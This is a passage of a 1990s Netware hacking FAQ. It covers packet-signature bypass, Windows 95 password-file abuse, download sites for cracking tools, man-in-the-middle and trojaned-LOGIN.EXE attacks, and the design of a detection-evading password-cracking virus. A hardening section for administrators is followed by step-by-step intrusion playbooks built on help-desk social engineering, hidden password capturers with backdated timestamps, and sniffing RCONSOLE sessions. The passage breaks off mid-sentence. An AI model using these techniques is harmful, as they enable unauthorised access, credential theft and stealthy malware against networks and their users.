NCS. There is a brand new NDS version of this product but I haven't look at it yet. The bindery version is god-awful slow, but completely accurate. It requires Supe access to run. Bindview can also produce a number of reports. including customized reports to give you all kinds of info on the server and its contents. For more info on Bindview: http://www.bindview.com/ For doing Auditing on a 3.x version of Netware, try AuditTrack. It will track all access to a directory or individual file by user, which can come in handy for seeing who is doing what. Out of the box Netware 3.11 has virtually no way to track what an individual user is doing, but the AuditTrack NLM helps greatly. E.G. Software, the developer, can be reached at: http://www.egsoftware.com/ Intrusion Detection Systems puts out a commercial product called Kane Security Analyst. It is considered by many to the "SATAN" of Netware. One of its abilities is locating hidden objects in the NDS tree. For a good demo, a 30 day trial version, and more info: http://www.intrusion.com/ "SafeWord for Netware Connect" is an NLM that does password checks in a Netware Connect environment: http://www.safeword.com/nwcspec.html There is a product called Password Helper that "enhances" the security around the changing of passwords for 3.x. It is a local EXE/server NLM product that allows non-Supe users to reset passwords. --------------------------------------------------------------------------- 07-11. What is Packet Signature and how do I get around it? Packet signatures works by using an intermediate step during the encrypted password login call, to calculate a 64-bit signature. This block is never transmitted over the wire, but it is used as the basis for a cryptographically strong signature ("secure hash") on the most important part of each NCP packet exchange. A signed packet can indeed be taken as proof sufficient that the packet came from the claimed PC. NCP Packet Signature is Novell's answer to the work of the folks in the Netherlands in hacking Netware. The idea behind it is to prevent forged packets and unauthorized Supervisor access. It is an add-on option in 3.11, but a part of the system with 3.12 and 4.x. Here are the signature levels at the client and server: Packet Signature Option and meaning: 0 = Don't do packet signatures 1 = Do packet signatures if required 2 = Do packet signatures if you can but don't if the other end doesn't support them 3 = Require packet signatures You can set the same settings at the workstation server. The default for packet signatures is 2 at the server and client. If you wish to use a tool like HACK.EXE, try setting the signature level at 0 on the client by adding Signature Level=0 in the client's NET.CFG. If packet signatures are required at the server you won't even get logged in, but if you get logged in, hack away. If you wish to change the signature level at the server, use a set command at the server console: SET NCP PACKET SIGNATURE OPTION=2 --------------------------------------------------------------------------- 07-12. Do any Netware utilities have holes like Unix utilities? This is a fairly common question, inspired by stack overrun errors, sendmail bugs, and the like that exist in the Unix world. The reason you do not have these kind of exploits in common Netware utilities is because: - You use a proprietary shell that can be loaded without accessing the server, therefore no shell exploits exist. - Virtually all Netware utilities do NOT use stdin and stdout, so no stack overruns that exploit anything. - Since the shell is run locally, not on the server, you have no way to use a utility to gain greater access than you have been granted, like a SUID script in Unix. - Yes there are utilities like HACK.EXE that grant extra access under certain conditions in 3.11, but no Novell-produced utility comes close to granting extra access. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 08 Netware and Windows 95 --------------------------------------------------------------------------- 08-1. Will Windows 95 cause server problems for Netware? By default Windows 95 shipped with long file names (LFN) and Packet Burst enabled, which created a unique problem -- if the server didn't have long name space loaded (OS/2 name space) it caused problems with files and occassionally crashed the server. But the worse one was Packet Burst. Unless you had at least a 3.11 server with the PBURST.NLM up and running, along with drivers for the server's network capable of handling Packet Burst, the buffer space used for network connections and/or the buffer space on the network card created problems ranging from lockups to timeouts to abends. There were a couple of different fixes you could do, like updating the server for long name space and Packet Burst (sorry Netware 2.x users), or you could update the clients' SYSTEM.INI file with the following entries: [nwredir] SupportBurst=0 SupportLFN=0 Alternately, a frame type (802.3) that doesn't support Packet Burst could be used, and you could enforce no LFNs via system policies. --------------------------------------------------------------------------- 08-2. Will Windows 95 cause network problems for Netware? If File & Print Sharing for Netware is configured and you have non-Windows 95 users, there could be serious network problems. How does this happen? Here is a very simplified explanation - The way Netware advertises its file and print services is via Netware's proprietary (but widely documented) Service Advertising Protocol (SAP). How to get to these resources is communicated via Routing Information Protocol (RIP) packets. Both SAP and RIP info are transmitted broadcast style. Netware servers and even intelligent networking equipment that conform to the SAP and RIP protocol scheme (like routers) share this info dynamically between each other. The problem is when Windows 95 is set up with File & Print Sharing for Netware, because the Windows 95 workstation does a lousy job of implementing and interacting with the SAP and RIP info. As any LAN/WAN specialist will tell you, extra SAPs can quickly waste bandwidth, causing timeouts and broadcast storms. And that is exactly what Windows 95 does. Netware 3.x and 4.x have released patches, but the easiest thing to do is simply NOT use File & Print Sharing under Windows 95 -- use Netware's file and print services like they're supposed to be used, or use Client/FPS for Microsoft networks instead. Can hackers take advantage of this? Here's the theory how - - Turn on File & Print Sharing for Netware in Windows 95. - On an SLIST the Windows 95 workstation will show up. - In a Netware 3.x and 4.x environment, there is an internal network number and an external number. Windows 95 will only show an external number, and since these numbers help determine how many hops away the service is, not having an internal one means (depending on your network layout) your Windows 95 workstation is one hop closer. - When a regular user boots up, the user needs to get to the nearest server to find his prefered server's location from the nearest server's SAP and RIP tables. Routers typically will simply pass on the name and address of the closest server attached to it. This with the hop counts will lead to a lot of attachments to the Winodws 95 server. Therfore even a PREFERED SERVER variable in the NET.CFG would not help. - To keep clients from timing out with an error, Microsoft passes the user onto the prefered server IF the Windows 95 server is set up with the same name. - In theory could create a \LOGIN directory and run your own LOGIN.EXE that grabbed the password and then send the client onto it's real server. What could prevent this? Well, in a WAN environment a router could be configured to only allow SAPs to come from certain segments, or every one of the workstations are running Windows 95 (which is probably Microsoft's solution). And even though I have heard from a dozen people stating that this could be done, no one has said they've done it (the alternate LOGIN directory and trojan LOGIN.EXE). --------------------------------------------------------------------------- 08-3. What's with Windows 95 and Netware passwords? Windows 95 has its own password file, and uses this file to store passwords to Windows 95 itself as well as Netware and NT servers. The problem here is that the PWL file is easily cracked by brute force, by using exploit code readily available on the Internet. To keep this from happening either Service Pack 1 should be applied (see Microsoft) or disable password caching. --------------------------------------------------------------------------- 08-4. Can Windows 95 bypass NetWare user security? I am unsure as to the conditions (if anyone knows, please forward me the info) but if your .PWL file is around 900 bytes versus 600 bytes, your workstation will log in without prompting you for a password. This bug was working as of December 1995, and I would think at this point patched via the latest service pack. Two ways this can be abused -- on some systems generating the longer file you can simply make sure you generate a .PWL file with the target account name and reboot using that .PWL file. The other way is to simply collect the .PWL file from an unattended workstation and boot using it (or attack it using the exploit code referenced in Section 08-3. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 09 Resources --------------------------------------------------------------------------- 09-1. What are some Netware FTP locations? These are from various FAQs. I have not checked all of these and I'm pretty sure some may no longer be up. But here's a starting point. Novell's ftp site: ftp.novell.com 137.65.3.11 ftp.novell.de 193.97.1.1 Novell's ftp Mirrors: netlab2.usu.edu 129.123.1.44 (the best) bnug.proteon.com 128.103.85.201 ftp.rug.nl /networks/novell 129.125.4.15 ftp.salford.ac.uk /novell 146.87.255.21 tui.lincoln.ac.nz /novell/novlib 138.75.90.4 novell.nrc.ca /netwire 132.246.160.4 Other Misc. Sites: ml0.ucs.ed.ac.uk /guest/pc 129.215.112.49 (second best) splicer2.cba.hawaii.edu /files/novell 128.171.17.2 /files/pegasus cc.usu.edu /slip 129.123.1.1 /tcp-ip risc.ua.edu /pub/network/novlib 130.160.4.7 /pub/network/pegasus /pub/network/misc /pub/network/tcpip wuarchive.wustl.edu /etc/system/novell 128.252.135.4 nctuccca.edu.tw 192.83.166.10 ftp.uni-kl.de /pub/novell 131.246.94.94 dorm.rutgers.edu /pub/novell 128.6.21.20 netlab.usu.edu /novell 129.123.1.11 /netwatch chaos.cc.ncsu.edu /pc/novell 152.1.10.23 /pc/utils /pc/email /pc/net /pc/manage dutiws.twi.tudelft.nl /pub/novell 130.161.156.11 sodapop.cc.LaTech.edu /pub/novell/specials 138.47.22.47 ftp.safe.net /pub/safetynet/ 199.171.27.2 ftp.best.com /pub/almcepud/hacks 206.86.8.2 ftp.efs.mq.edu.au /pub/novell 137.111.55.8 nic.switch.ch /mirror/novell 139.50.1.40 onyx.infonexus.com /pub/ToolsOfTheTrade/Netware 204.162.164.220 biomed.engr.LaTech.edu /sys/pub/ecl/specials 138.47.15.1 ftp.iag.net /pub/clipper/ --------------------------------------------------------------------------- 09-2. What are some Netware WWW locations? http://www.novell.com/ Novell in Provo http://www.novell.de/ Novell in Europe http://www.salford.ac.uk/ais/Network/Novell-Faq.html Novell@listserv.syr.edu http://mft.ucs.ed.ac.uk/ Edinburg Tech Library* http://www.efs.mq.edu.au/novell/faq comp.sys.novell FAQ http://occam.sjf.novell.com:8080 Online manuals http://www.safe.net/safety Security Company http://grendel.ius.indiana.edu/~gmiller/ New fave site! http://www.rad.kumc.edu/share/novell/apps/ Great tool collection http://www.cis.ohio-state.edu/hypertext/faq/usenet/netware/security/faq.html comp.os.netware.security FAQ http://www.fsid.cvut.cz/pub/net/msdos/packet-monitor/ Sniffers * Excellent site for tons of techie info. The Netware Server Management section should be read be all hackers and admins alike. --------------------------------------------------------------------------- 09-3. What are some Netware USENET groups? Netware specific: comp.os.netware.misc (main group, replaced comp.sys.novell) comp.os.netware.announce (moderated announcements) comp.os.netware.security (security issues) comp.os.netware.connectivity (connect. issues incl. LAN Workplace) Security, H/P in general: alt.2600 alt.security comp.security.announce comp.security.misc --------------------------------------------------------------------------- 09-4. What are some Netware mailing lists? * NOVELL@listserv.syr.edu - send an email with no subject to listserv@listserv.syr.edu with "subscribe NOVELL Your Full Name" in the body. You must reply to the message within two days or you'll not be added to the list. The same address no subject with "unsubscribe NOVELL" takes you off the list. Greg Miller has set up a NetWare security mailing list. You can subscribe to it by sending the following text in the message body (not the subject): subscribe netware-hack to majordomo@dey-systems.com. The list is intended for DETAILED discussion of NetWare security. There are at least 17 other mailing lists in existence that are Netware and psuedo Netware related. These can be found in the NOVELL@listserv.syr.edu FAQ listed in section 09-5. --------------------------------------------------------------------------- 09-5. Where are some other Netware FAQs? The most complete general Netware resource, the FAQ for NOVELL@LISTSERV.SYR.EDU is available from many locations, including: ftp://netlab2.usu.edu/misc/faq.txt and http://netlab1.usu.edu/novell.faq/nov-faq.htm Stanley Toney publishes a bi-weekly Netware Patches and Updates FAQ in comp.os.netware.announce. It is also available at ftp://ftp.nsm.smcm.edu/pub/novell/patchfaq.zip. Marcus Williamson has a FAQ exclusively for Netware 4: http://ourworld.compuserve.com/homepages/marcus_williamson/ Don't forget the alt.2600/#hack FAQ as a general hacking/phreaking resource, available at rtfm.mit.edu among other locations. --------------------------------------------------------------------------- 09-6. Where can I get the files mentioned in this FAQ? SETPWD.NLM - ml0.ucs.ed.ac.uk /guest/pc/novell/nlms setpwd.zip SETSPWD.NLM - netlab2.usu.edu /misc SETSPASS.NLM - netlab2.usu.edu /misc NOVELBFH.EXE - ftp.fastlane.net /pub/nomad/nw novelbfh.zip KNOCK.EXE - ftp.fastlane.net /pub/nomad/nw knock.zip LOGIN.EXE - ftp.fastlane.net /pub/nomad/nw nwl.zip PROP.EXE - ftp.fastlane.net /pub/nomad/nw nwl.zip CHKNULL.EXE - ftp.fastlane.net /pub/nomad/nw chk0.zip USERLST.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip LASTHOPE.NLM - ml0.ucs.ed.ac.uk /guest/pc/novell/nlms lasthope.zip NW-HACK.EXE - ftp.fastlane.net /pub/nomad/nw nw-hack.zip SUPER.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils super.zip CONLOG.NLM - ml0.ucs.ed.ac.uk /guest/pc/novell X-AWAY.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils x-away.zip GRPLIST.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip GETEQUIV.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip TRSTLIST.EXE - ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip SECUREFX.NLM - www.novell.com Search for it in the Tech Section RCON.EXE - onyx.infonexus.com /pub/ToolsOfTheTrade/Netware rcon.zip SMARTPASS - ftp.efs.mq.edu.au /pub/novell smrtpw.zip BINDERY.EXE - onyx.infonexus.com /pub/ToolsOfTheTrade/Netware bindery.zip Duplicates of some of these files exist at my site, ftp.fastlane.net, and at onyx.infonexus.com. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 10 Netware APIs --------------------------------------------------------------------------- 10-1. Where can I get the Netware APIs? Stateside call 1-800-RED-WORD, it's $50 USD, and includes a 2-user license of Netware 4.1. Most brand-name compilers will work, but if you're writing NLMs you'll need Watcom's latest. It's the only one I know of that will do NLM linking. --------------------------------------------------------------------------- 10-2. Are there alternatives to Netware's APIs? There are three that I am aware of. Here is info on them - Visual ManageWare by HiTecSoft (602) 970-1025 This product allows development of NLMs and DOS EXEs using a Visual Basic type development environment. Runtime royalty-free development without C/C++ and without Watcom. However links are included for C/C++ programs. The full SDK including compilers is USD$895.00. Pricey but looks good, I have not used this product. Here is Teiwaz' edited report on the other - [quote] Here is another source for 'c' libs for Netware. He sells both DOS / Windows style libs. The Small memory model size for DOS, a bit of source is free. FTP oak.oakland.edu/SimTel/msdos/c/netclb30.zip Public Domain Small Mem Model Lib Author Adrian Cunnelly - adrian@amcsoft.demon.co.uk Price the current price in US Dollars is: 38 Dollars - All model libraries + windows DLL 110 Dollars - Above + Source Code [endquote] And take a look at Greg Miller's site, especially for those Pascal coders out there: http://grendel.ius.indiana.edu/~gmiller/ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 11 Mathematical/Theoretical --------------------------------------------------------------------------- 11-1. How does the whole password/login/encryption thing work? In 3.x and 4.x, passwords are encrypted. Here is the rough way in which 3.x handles this - 1. Alice sends a login request to the server 2. The server looks up Alice's name and retreives her UID. The server also generates a random value R, and sends the (UID,R) pair to Alice. 3. Alice generates X=hash(UID,password) then Y=hash(R,X). Alice then sends Y to the server. 4. The server retreives the stored value X'=hash(UID,password), and computes Y'=hash(X',R). If Y=Y' Alice is granted access. 5. Both Alice and the server compute Z=hash(X,R,c) (c is some constant value). Z is then used as the signature key for the current session. Note: Step #5 is only done if both Alice and the server agree to sign packets. The NetWare 4.x login sequence (4.x uses a private/public key scheme using RSA): 1. Alice requests a login from the server. 2. The server generates a random value R, and retrieves X'=hash(UID, password). 3. Alice computes X=hash(UID,password) and Y=hash(X,R). Alice generates a random value R2, retreives the servers public key and sends the pair (Y,R2) to the server encrypted with the server's public key. 4. The server decrypted the (Y,R2) pair. If Y=Y', the server retrieves Alice's private key, computes Z=(Alice's private key XOR R2) and transmits Z to Alice. 5. Alice computes private_key=R2 XOR Z. It should be noted that Netware 4.x encrypts Alice's RSA private key with X' when it's stored on the server. --------------------------------------------------------------------------- 11-2. Are "man in the middle" attacks possible? In theory, by looking at the methods outlined in section 11-1 there are several possibilities. First, Netware 3.x - This is a variation of the Man-In-The-Middle attack used to attack public key cryptosystems. A real MITM attack will also work, but the link must be shut down in order to implement a MITM attack, and someone is likely to know something is up. This attack requires that Bob (the attacker) be capable of sending packets to both the server and Alice (the user attempting to login) faster than the server and Alice can send packets to each other. There are a number of ways to set up this scenario. The best way is to implement a MITM attack by either by attacking a router, or by segmenting the wire between the server and Alice. Another way is to gain two entry points into the network (one close to Alice, the other close to the server). The best way to do this is to wire two hosts together in the specified locations. If using wire is infeasable (which in most cases it will be), Bob can use wireless network cards, or modems plugged into existing phone jacks, or modems with cellular capability. If modems are used, the attack will require Bob to take control of two computers on the network, and will increase the time needed to get packets to Alice or the server. This attack will not work if the server requires Alice to sign packets. Alice's workstation may be set up to sign packets, and Alice can still use signed packets, and the attack will still work. However, if all hosts are required to sign packets, the attack won't work. This is because Bob will never know Alice's password, nor will he ever know X=hash(UID,password). Since NetWare 3.x defaults to allowing the host to decide wether or not to sign packets, this attack is still feasable. Sysadmins can defeat this attack by requiring packet signatures for all hosts. The attack: When Bob sees Alice request a login, Bob also requests a login as Alice from. The server will generate two random values (R[a] and R[b], denoting the R sent to Alice and the R sent to Bob respectivley). When Bob receives R[b], he spoofs the servers address and sends R[b] to Alice. Alice will think the server requested Alice to compute Y[b]=hash(X,R[b]) rather than what the server really intended: Y[a]=hash(X,R[a]). Alice will then send Y[b] to the server, Bob will sniff Y[b] from the network as Alice sends it, and transmit it to the server (using his real address). At this point the server will think Alice has attempted to login twice. Bob's attempt will work, and Alice's attempt will fail. If all went well, Bob has assumed the identity of Alice without knowing her password, and Alice is re-typing in her password. If the server won't allow the same user to login twice simultaneously, or ever aborts both login sequences after retreiving two responses to the same question, then Bob should saturate a network (but not shut it down completely) between Alice and the server while Bob is attempting to login as Alice. For the ultra paranoid: Bob should be careful, there may be another attacker, Joe, just waiting for Alice to login with packet signing turned off. Here Joe can also assume the identity of Alice with significantly less effort. Now let's discuss Netware 4.x (noting the login sequence in section 11-1): The attack follows the Netware 3.x attack until Alice attempts to retrieve the server's public key. At this point Bob sends his own public key to Alice. Alice will then send the server the pair (Y,R2) encrypted with Bob's public key. Bob sniffs this information off the network, decrypts the pair (Y,R2). Then generates his own R2 (or keeps the one Alice chose), retreives the real public key of the server and sends the server the pair (Y,R2) encrypted with the server's real public key. If server the is requiring packet signature, the server will then send Bob Z to allow him access as Alice. Bob doesn't know Alice's private key, as he never receives it. Remember that Netware 4.x encrypts Alice's RSA private key with X' when it's stored on the server, and is never send unencrypted on the wire. So Bob can't sign packets as Alice. But Bob is not completely out of luck yet. Bob can try an offline attack at guessing Alice's password since he knows Y', R and Alice's UID. Bob needs to find X, such that Y=hash(X,R) = Y'. Since it's likely that Alice's password in not a particularly good one, this is a severe reduction in security, but not a total breach, since Bob can compute X by finding a password such that X=hash(pass,UID). Once Bob knows X, he can determine what Alice's private RSA key is. THEN he can sign packets. It should be noted that Alice may cache the server's public key for the second login attempt. If this is true, Alice won't be able to login and may notice what has happened. But Alice's private RSA key will never change, and once that is attained is doesn't matter even if Alice changes her password. Alice's password can still be discovered. --------------------------------------------------------------------------- 11-3. Are Netware-aware viruses possible? A NetWare aware virus could allow an attacker to gain access to a large number of servers available on the network. Using one of the strategies used by the Internet Worm of 1988 combined with simple virus strategy, a virus can be constructed to infect many clients/servers across many networks (the virus could also employ attacks similiar to HACK.EXE or even section 11-2's Man-In-The_Middle attacks). Some NetWare networks will have a large number of servers attached. It's also true that most users (including Supe and Admin) will use the same password on many different servers (some may have no password at all). A virus could exploit this vulnerability and spread to other servers which it otherwise would not have access to. The virus could also use the idle CPU time on infected clients to crack the passwords of other users. However, care must be taken not to give the virus away by setting off intruder detection alarms. The virus should randomly select one user from a randomly selected server attempt to login using a randomly selected word from a wordlist. How often the client should attempt logins depends upon the size of the network (remember that if the virus succeeds, there may be 10s of thousands of clients breaking passwords in parrallel). The virus should estimate the size of the network, and use laws of probibility to determine how often to attempt a break in so that no account is tried twice in the same hour. This should be calculated by relating the number of unique accounts, the number of clients (estimated by monitoring network traffic and assuming all servers have the same number of clients on their network. While this is not 100% accurate, this should be accurate enough for our purposes. Some the estimated success rate of the virus (measured in propagation delay for infecting hosts per day from a single host), and the length of time the virus has been running should be considered. Using A=number of unique accounts, P = propagation delay, and n = number of days virus has been running, then the following computes the number of guesses the client should make per hour: (A*24)/(P^n). What should or could this virus do? Well, if it is running on a workstation with a network card, we could sniff logins. Since R and hash(X,R) are sent in the clear (see section 11-01), the virus could attempt an offline computational attack against X, thus avoiding a brute force attack that could trigger intruder detection. The virus can't use the MITM attacks on the login sequence because it doesn't have the required wiring topology neccessary to implement the attack. Yes, you COULD try and build that in but then it probably would be too big and noticeable. Remember, we're talking virus, not stand-alone application. --------------------------------------------------------------------------- 11-4. Can a trojaned LOGIN.EXE be inserted during the login process? Apparently so. Here is a different perspective of the login sequence which is common to all versions of NetWare: 1. The workstation attaches to the server. 2. The workstation maps a drive to the server's SYS:\LOGIN directory. 3. The workstation downloads LOGIN.EXE from the server and executes it. 4. If the user is authenticated, the workstation downloads and executes the login script. The hole in this protocol is when the workstation downloads LOGIN.EXE. Since the user isn't logged in, there is no packet signing available, thus any workstation is capable of impersonating the server. Here the attacker can simply sniff the request to download LOGIN.EXE from the network, and then send the workstation ANY program in return and the workstation will execute it. The optimal attack here would be to send a modified copy of the real LOGIN.EXE file. The modified EXE could encrypt the user's password (using public key crypto) and broadcast it to the network. However, the modified EXE could also carry out the login handshake as normal and log the user in and executing the login script. With this attack, the target user would have no way of identifying that anything out of the ordinary has happened. It appears that NetWare always starts with the sequence numbers at 0 and increments seq + 1 from there for the remainder of the session. Thus it's possible to predict the sequence numbers. This will allow the attacker to exploit the hole without using a MITM attack and still allow the conversation to continue normally by using only a single workstation. The attack can also be carried out by any single host on the network which is capable of sniffing the request to download LOGIN.EXE. It's also possible to do this even if the workstation and the server are on the same network (if and only if the server is slower responding to requests than the attacker's machine). Here the attacker just makes up the sequence numbers, and sends the workstation a phony LOGIN.EXE which will broadcast the user's password (again, encrypted) over the network and then re-boot the machine. (It's also possible for the attacker to log the user in and have the attack transperent to the user. In this case, the attacker would have to sniff one of the server's packets off the network, and re-send it to the workstation with adjusted sequence numbers so that the workstation's next ACK will synch with the server's sequence numbers. Note that the attacker will have to artificially ACK the packets the server sends when the client tries to download LOGIN.EXE.) It's been stated that only the first few bytes of NetWare packets are signed. That means the user can not only modify LOGIN.EXE on the fly, but can modify any program on the fly. Let's put this into a more proper perspective. The exploit program would take the MAC address of an admin/supe person as a parameter, wait for the user to attempt to login, exploit the host, and exit. If the attacker didn't want to take the effort to allow the conversation to continue, s/he could make the exploit program re-boot the host automatically after broadcasting the password over the network (once again, encrypted and intended for the attacker). Obviously we don't need to exploit a large range of hosts, only the ones with LAN admins logging in. This would typically be a small subset of machines (which quite possibly normal users wouldn't have access to in order to prevent the use of keyboard capture routines). So all the attacker needs to do is exploit the host where the Admin-equiv logs in. The idea came from an already known hole in NFS for UNIX (it's exploited exactly the same way). But NetWare is supposed to avoid this hole through the use of packet signatures. It obviously didn't. The exploit for this hole would really not be much different than the code for HACK.EXE which uses the same principles. Of course, this hole allows anyone to execute any arbitrary program on any host. So the possibilities are only limited to your imagination, especially if you start combining the techniques from section 11. A virus that did the LOGIN.EXE spoof that left code to decypher the private key of each workstation comes leaping to mind... Now the MITM attack isn't required to take advantage of any part of this attack. It would be if the attacker couldn't predict the server's and the user's sequence numbers. This has the following effects: 1. The attacker doesn't need to sniff one of the server's packets off the network to resynchronize the sequence numbers. 2. The attacker doesn't need to artifically ACK the server's responses. 3. The MITM attack isn't needed to modify a program on the fly. Any single workstation can implement the attack. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 12 For Administrators Only --------------------------------------------------------------------------- 12-1. How do I secure my server? This question is asked by administrators, and I'm sure no hackers will read this info and learn what you admins might do to thwart hack attacks ;-) One thing to keep in mind, most compromises of data occur from an employee of the company, not an outside element. They may wish to access sensitive personnel files, copy and sell company secrets, be disgruntled and wish to cause harm, or break in for kicks or bragging rights. So trust no one. Physically Secure The Server - ------------------------------ This is the simplest one. Keep the server under lock and key. If the server is at a site where there is a data center (mainframes, midranges, etc) put it in the same room and treat it like the big boxes. Access to the server's room should be controlled minimally by key access, preferably by some type of key card access which can be tracked. In large shops, a man trap (humanoid that guards the room) should be in place. If the server has a door with a lock, lock it (some larger servers have this) and limit access to the key. This will secure the floppy drive. One paranoid site I know of keeps the monitor and CPU behind glass, so that the keyboard and floppy drive cannot be accessed by the same person at the same time. If you only load NLMs from the SYS:SYSTEM directory, use the SECURE CONSOLE command to prevent NLMs being loaded from the floppy or other location. A hacker could load a floppy into the drive and run one of several utility files to gain access to the server. Or they could steal a backup tape or just power off the server! By physically securing the server, you can control who has access to the server room, who has access to the floppy drive, backup tapes, and the System Console. This step alone will eliminate 75% of attack potential. Secure Important Files - ------------------------ These should be stored offline. You should make copies of the STARTUP.NCF and AUTOEXEC.NCF files. The bindery or NDS files should be backed up and stored offsite. All System Login Scripts, Container Scripts, and any robotic or non-human personal Login Scripts should be copied offline. A robotic or non-human account would be an account used by an email gateway, backup machine, etc. Compile a list of NLMs and their version numbers, and a list of files from the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories. You should periodically check these files against the originals to ensure none have been altered. Replacing the files with different ones (like using itsme's LOGIN.EXE instead of Novell's) will give the hacker access to the entire server. It is also possible that the hacker will alter .NCF or Login Scripts to bypass security or to open holes for later attacks. Make a list of Users and their accesses - ----------------------------------------- Use a tool like Bindview or GRPLIST.EXE from the JRB Utilities to get a list of users and groups (including group membership). Once again, keep this updated and check it frequently against the actual list. Also run Security (from the SYS:SYSTEM directory) or GETEQUIV.EXE from the JRB Utilities to determine who has Supervisor access. Look for odd accounts with Supervisor access like GUEST or PRINTER. It is also a good idea to look at Trustee Assignments and make sure access is at a minimum. Check your run from Security to see if access is too great in any areas, or run TRSTLIST from the JRB Utilities. Security will turn up some odd errors if SUPER.EXE has been run. If you are not using SUPER.EXE, delete and rebuild any odd accounts with odd errors related to the Bindery, particularly if BINDFIX doesn't fix them yet the account seems to work okay. If a hacker put in a backdoor using SUPER.EXE, they could get in and perhaps leave other ways in. Monitor the Console - --------------------- Use the CONLOG.NLM to track the server console activity. This is an excellent diagnostic tool since error messages tend to roll off the screen. It will not track what was typed in at the console, but the system's responses will be put in SYS:ETC\CONSOLE.LOG. When checking the console, hit the up arrow to show what commands were last typed in. While this won't work in large shops or shops with forgetful users, consider using the SECUREFX.NLM (or SECUREFX.VAP for 2.x). This sometimes annoying utility displays the following message on the console and to all the users after a security breach: "Security breach against station <connection number> DETECTED." This will also be written to an error log. The following message is also written the the log and to the console: "Connection TERMINATED to prevent security compromise" Turn on Accounting - -------------------- Once Accounting is turned on, you can track every login and logout to the server, including failed attempts. Don't Use the Supervisor Account - ---------------------------------- Leaving the Supervisor logged in is an invitation to disaster. If packet signature is not being used, someone could use HACK.EXE and gain access to the server as Supervisor. HACK spoofs packets to make them look like they came from the Supervisor to add Supe equivalence to other users. Also, it implies a machine is logged in somewhere as Supervisor, if it has been logged in for more than 8 hours chances are it may be unattended. Use Packet Signature - ---------------------- To prevent packet spoofing (i.e. HACK.EXE) enforce packet signature. Add the following line to your AUTOEXEC.NCF - SET NCP PACKET SIGNATURE OPTION=3 This forces packet signature to be used. Clients that do not support packet signature will not be able to access, so they will need to be upgraded if you have any of these clients. Use RCONSOLE Sparingly (or not at all) - ---------------------------------------- When using RCONSOLE you are subject to a packet sniffer getting the packets and getting the password. While this is normally above the average user's expertise, DOS-based programs that put the network interface card into promiscuous mode and capture every packet on the wire are readily available on the Internet. The encryption method is not foolproof. Remember you cannot "detect" a sniffer in use on the wire. Do NOT use a switch to limit the RCONSOLE password to just the Supervisor password. All you have done is set the password equal to the switch. If you use the line "LOAD REMOTE /P=", Supervisor's password will get in (it ALWAYS does) and the RCONSOLE password is now "/P=". Since the RCONSOLE password will be in plain text in the AUTOEXEC.NCF file, to help secure it try adding a non-printing character or a space to the end of the password. And while you can use the encryption techniques outlined in 02-8, your server is still vulnerable to sniffing the password. Move all .NCF files to a more secure location (3.x and above) - --------------------------------------------------------------- Put your AUTOEXEC.NCF file in the same location as the SERVER.EXE file. If a server is compromised in that access to the SYS:SYSTEM directory is available to an unauthorized user, you will at least have protected the AUTOEXEC.NCF file. A simple trick you can do is "bait" a potential hacker by keeping a false AUTOEXEC.NCF file in the SYS:SYSTEM with a false RCONSOLE password (among other things). All other .NCF files should be moved to the C: drive as well. Remember, the .NCF file runs as if the commands it contains are typed from the console, making their security most important. Use the Lock File Server Console option in Monitor (3.x and above) - -------------------------------------------------------------------- Even if the RCONSOLE password is discovered, the Supe password is discovered, or physical access is gained, a hard to guess password on the console will stop someone from accessing the console. Add EXIT to the end of the System Login Script - ------------------------------------------------ By adding the EXIT command as the last line in the System Login Script, you can control to a degree what the user is doing. This eliminates the potential for personal Login Script attacks, as described in section 03-6. Upgrade to Netware 4.1 - ------------------------ Besides making a ton of Novell sales and marketing people very happy, you will defeat most of the techniques described in this faq. Most well-known hacks are for 3.11. If you don't want to make the leap to NDS and 4.1, at least get current and go to 3.12. Check the location of RCONSOLE.EXE - ------------------------------------ In 3.11, RCONSOLE.EXE is located in SYS:SYSTEM by default. In 3.12 and 4.1 it is in SYS:SYSTEM and SYS:PUBLIC. You may wish to remove RCONSOLE.EXE from SYS:PUBLIC, as by default everyone will have access to it. Remove [Public] from [Root] in 4.1's NDS- ----------------------------------------- Get the [Public] Trustee out of the [Root] object's list of Trustees. Anyone, even those not logged in, can see virtually all objects in the tree, giving an intruder a complete list of valid account names to try. Load the LOGIN.EXE locally - ---------------------------- Copy the LOGIN.EXE to the local hard drive. Not only does this speed up the login process ever so slightly, it prevented trojaned LOGIN.EXEs from being introduced during the login process. While this does create a problem with exposing the LOGIN.EXE on the C: drive to local attack, you could download a fresh copy during the login process to try and at least keep a clean copy on the local drive. --------------------------------------------------------------------------- 12-2. I'm an idiot. Exactly how do hackers get in? We will use this section as an illustrated example of how these techniques can be used in concert to gain Supe access on the target server. These techniques show the other thing that really helps in Netware hacking - a little social engineering. Exploitation #1 --------------- Assume tech support people are dialing in for after hours support. Call up and pose as a vendor of security products and ask for tech support person. Called this person posing as a local company looking for references, ask about remote dial-in products. Call operator of company and ask for help desk number. Call help desk after hours and ask for dial-in number, posing as the tech support person. Explain home machine has crashed and you've lost number. Dial in using the proper remote software and try simple logins and passwords for dial-in software if required. If you can't get in call help desk especially if others such as end users use dial-in. Upload alternate LOGIN.EXE and PROP.EXE, and edit AUTOEXEC.BAT to run the alternate LOGIN.EXE locally. Rename PROP.EXE to IBMNBIO.COM and make it hidden. Before editing AUTOEXEC.BAT change the date and time of the PC so that the date/time stamp reflects the original before the edit. Dial back in later, rename PROP.EXE and run it to get Accounts and passwords. Summary - Any keystroke capture program could produce the same results as the alternate LOGIN.EXE and PROP.EXE, but you end up with a Supe equivalent account. Exploitation #2 --------------- Load a DOS-based packet sniffer, call the sys admin and report a FATAL DIRECTORY ERROR when trying to access the server. He predictively will use RCONSOLE to look at the server and his packet conversation can be captured. He will find nothing wrong (of course). Study the capture and use the RCON.FAQ to obtain the RCONSOLE password. Log in as GUEST, create a SYSTEM subdirectory in the home directory (or any directory on SYS:). Root map a drive to the new SYSTEM, copy 